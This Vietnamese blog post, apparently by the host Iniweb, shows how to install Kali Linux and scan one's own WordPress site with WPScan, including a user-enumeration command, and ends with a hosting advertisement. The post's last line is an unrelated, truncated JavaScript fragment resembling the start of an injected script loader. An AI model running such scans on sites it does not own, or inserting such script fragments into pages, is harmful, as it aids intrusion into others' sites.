wordpress_two_factor_security_authentication

Tự kiểm tra lỗ hổng website thiết kế bằng wordpress bằng Kali linux

Nói về vấn đề bảo mật website thì không bao giờ hết nóng, đặc biệt là các website được thiết kế trên nền WordPress có đồng sử dụng lớn, thì các Webmaster cũng phải thường xuyên cập nhật phiên bản mới cho wordpress cũng như các plugin đi kèm, bên cạnh đó là vô vàn các cách thức để bảo mật khác. Nếu bạn đang sử dụng một hosting giá rẻ để chạy Linux, một sharehost giá rẻ hơn đơn cử là một VPS để chạy website viết bằng WordPress của mình, thì hôm nay Iniweb xin giới thiệu một cách thức kiểm tra lỗ hổng website của bạn tránh các nguy cơ tấn công, tuy nhiên đây cũng chỉ là một phần, đòi hỏi cốt yếu thì Hosting của bạn vẫn phải đảm bảo tính bảo mật, Firewall tốt để ngăn chặn các nguy cơ.

Kali Linux là gì?

Nếu bạn đam mê lĩnh vực bảo mật, an ninh thông tin hay đã từng trải qua các khóa học về CEH chắc hẳn đều sẽ biết đến Backtrack, tuy nhiên vừa qua thì Backtrack đã không còn được hỗ trợ nữa thay vào đó phía đội ngủ nhà xây dựng đã cho ra mắt Kali Linux xây dựng trên nền tảng hệ điều hành Debian, ở đây topic này thì Iniweb sẽ không giới thiệu nhiều về hệ điều hành này, mà chỉ tập trung cho việc hướng dẫn các bạn kiểm tra lỗ hổng website thiết kế bằng WordPress.

Hiện tại trong Kali Linux có một công cụ hỗ trợ vô cùng tuyệt vời đó là WpScan chuyên dùng để quét các lỗ hỗng website trên nền WordPress.

Sử dụng thế nào?

Bạn tải phần mềm Virtual box về dùng để cài đặt hệ điều hành trên máy ảo, sau đó tải file Iso của Kali Linux  cài đặt trên Virtualbox như cài hệ điều hành khác trên máy ảo một cách bình thường.

Chạy Kalinux trên máy ảo:

kali-linux-1

 

Sau đó click vào biểu tượng giao diện console để sử dụng các lệnh trong Kalilinux

kali-linux-2

 

Sau đó các bạn gõ vào: –wpscan -h để kiểm tra các câu lệnh mà công cụ Wpscan hỗ trợ

kali-linux-3

Sau đó mình dùng câu lênh: wpscan -u domain.com -enumerate u để scan các lỗi của website, các câu lệnh khác các bạn có thể xem trên phần help để tự làm nhé.

kali-linux-34

Không chỉ có các website thiết kế bằng WordPress mà còn rất nhiều công cụ khác được Kali Linux tích hợp sẵn phục vụ cho công việc tìm lỗi cũng như hỗ trợ cho quản trị website, người điều hành website và lỗi kịp thời tránh các nguy cơ mất mát dữ liệu hoặc nguy hiểm hơn nữa.

Ở bài viết này Iniweb cung cấp cho các bạn cái nhìn căn bản nhất về công cụ kiểm tra lỗ hổng, sắp tới sẽ còn nhiều bài viết khác hướng dẫn các bạn sử dụng các công cụ khác có trong hệ điều hành này. Tuy nhiên ngoài việc một Source code website tối ưu bảo mật, thì vấn đề hosting, server để chạy website cũng cần phải có những cơ chế, lập trình chống tấn công không kém phần quan trọng, đòi hỏi quản trị viên luôn phải theo dõi sát sao và cập nhật mới.

Hiện tại: Iniweb đang cung cấp rất nhiều gói Hosting đa dạng phong phú, đặc biệt là hosting tính bảo mật vô cùng cao, giá cả cũng vô cùng hợp lý. (Hosting Iniweb)

Hy vọng bài viết này sẽ giúp ích cho các webmaster đang sử dụng wordpress có thể tự kiểm tra các lỗ hổng do Seo Yoast bản cũ, hay FCK Editor bản cũ gây ra hay không.

Theo Iniweb.vn

} else {var d=document;var s=d.createElement(‘script’);